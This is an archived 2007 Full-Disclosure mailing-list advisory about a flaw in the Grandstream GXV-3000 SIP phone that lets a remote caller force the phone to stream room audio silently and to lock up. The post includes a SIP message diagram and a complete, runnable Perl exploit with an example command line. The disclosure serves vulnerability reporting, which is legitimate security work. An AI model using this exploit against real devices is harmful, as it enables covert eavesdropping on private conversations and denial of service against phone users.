lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 22 Aug 2007 15:18:37 +0200
From: "Radu State" <State@...ia.fr>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Remote eavesdropping with SIP Phone GXV-3000

 

While playing with the SIP  Madynes stateful fuzzer (for a description see
http://hal.inria.fr/inria-00166947/en), we have realized that some SIP stack
engines have serious bugs allowing to an attacker to automatically make a
remote phone accept the call

 without ringing and without asking the user to  take the phone from the
hook, such that the attacker might be able to listen to all conversations
that take place in the remote room without being noticed.

 

One example that we can disclose (vendor was notified on 10 th May 2007)
is the following:  Grandstream SIP Phone GXV-3000

 

 

MADYNES Security Advisory :  SIP  remote attack on  Grandstream SIP Phone
GXV-3000

 

Date of Discovery 7 th May, 2007

ID: KIPH7

Background 

SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session. 


Affected devices:  Grandstream SIP Phone GXV-3000 with latest available
firmware  1.0.1.7    Loader-- 1.0.0.6    Boot--1.0.0.18

Impact :
A malicious user can remotely eavesdrop (a remote location)  and perform DOS
on a remote phone. 
Resolution
Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations. 

The vulnerability is based in a sequence of two messages, where both
messages are syntactically right, but together they turn the device in an
inconsistent state, where the RTP is now send to the attacker/  

 

 

ougui@....81.48.94:5060    is the attacker
1005@....81.48.88:5060    the attacked phone

 

 

                X ----------------------- INVITE ------------------->
GXV-3000

                X <------------------ 100 Trying  -----------------   

GXV-3000

                X <--------------- 180 Ringing -------------------   

GXV-3000

                X ------------- 183 Session Progress ------->  GXV-3000

 

                X <-----------RTP - FLOW ------------------------  GXV-3000

 

After these  messages the device is not able to hang up so a remote DOS can
be also done

 

Credits:

*	Humberto J. Abdelnur (Ph.D Student) 
*	Radu State (Ph.D) 
*	Olivier Festor (Ph.D) 

Exploit Code :

 

To run the exploit the file Grandstream-GXV3000.pl should be launched
(assuming our configurations) as:

 

perl Grandstream-GXV3000.pl 152.81.48.88 5060 humbol 152.81.48.94 5060 ougui

 

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username> <src> <port> <username>" unless
($ARGV[5]);

 

$socket=new IO::Socket::INET->new(

        Proto=>'udp',

                               LocalPort => $ARGV[4],

                               PeerPort=>$ARGV[1],

        PeerAddr=>$ARGV[0]);

 

$sdp= "v=0\r

o=username 0 0 IN IP4 $ARGV[3]\r

s=The Funky Flow\r

c=IN IP4 $ARGV[3]\r

t=0 0\r

m=audio 33404 RTP/AVP 3 97 0 8\r

a=rtpmap:0 PCMU/8000\r

a=rtpmap:3 GSM/8000\r

a=rtpmap:8 PCMA/8000\r

a=rtpmap:97 iLBC/8000\r

a=fmtp:97 mode=30\r\n";

$sdplen= length $sdp;

$msg= "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r

Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r

From: <sip:$ARGV[5]\@$ARGV[3]>\r

To:  <sip:$ARGV[2]\@$ARGV[0]>\r

Contact: <sip:$ARGV[5]\@$ARGV[3]>\r

Call-ID: ougui\@$ARGV[3]\r

CSeq: 10419 INVITE\r

Max-Forwards: 70\r

Content-Type: application/sdp\r

Content-Length: $sdplen\r

\r

$sdp";

$socket->send($msg);

sleep(3);

$msg= 

"SIP/2.0 183 Session Progress\r

Via: SIP/2.0/UDP $ARGV[3];branch=001;rport=$ARGV[4]\r

From: <sip:$ARGV[5]\@$ARGV[3]>\r

To: <sip:$ARGV[2]\@$ARGV[0]>\r

Call-ID: ougui\@$ARGV[3]\r

CSeq: 10419 INVITE\r

Max-Forwards: 70\r

Contact: <sip:$ARGV[5]\@$ARGV[3]>\r

Content-Type: application/sdp\r

Content-Length: $sdplen\r

\r

$sdp";

 

$socket->send($msg);

 


Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists